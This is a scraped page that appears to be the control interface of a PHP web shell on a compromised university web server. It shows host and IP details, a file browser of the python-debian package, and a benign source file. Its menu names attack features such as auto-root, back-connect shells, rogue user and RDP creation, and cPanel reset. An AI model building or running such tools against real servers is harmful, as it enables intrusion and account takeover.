Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.128.206.7
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
debian /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
1.03
KB
-rw-r--r--
_version.py
65
B
-rw-r--r--
arfile.py
13.1
KB
-rw-r--r--
changelog.py
37.06
KB
-rw-r--r--
copyright.py
24.06
KB
-rw-r--r--
deb822.py
84.21
KB
-rw-r--r--
debfile.py
14.61
KB
-rw-r--r--
debian_support.py
22.95
KB
-rw-r--r--
debtags.py
18.76
KB
-rw-r--r--
deprecation.py
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
""" Tools for working with Debian-related file formats """ __version__ = "" try: # pylint: disable=no-member import debian._version # type: ignore __version__ = debian._version.__version__ # type: ignore except ImportError: try: # Try to extract the version from the package changelog and # determine whether it is a post-release or pre-release version. import os.path import debian.changelog changelog_filename = os.path.join( os.path.dirname(__file__), '..', '..', 'debian', 'changelog') with open(changelog_filename, 'rb') as fh: c = debian.changelog.Changelog(fh) version = str(c.get_version()) mark = "~" if c.distributions == 'UNRELEASED' else "+" except: # pylint: disable=bare-except # Fake a version string in desperation version = '0.0.0' mark = '-' import datetime timestamp = datetime.datetime.utcnow().strftime("%Y%m%d") __version__ = "%s%sgit%s" % (version, mark, timestamp)
Close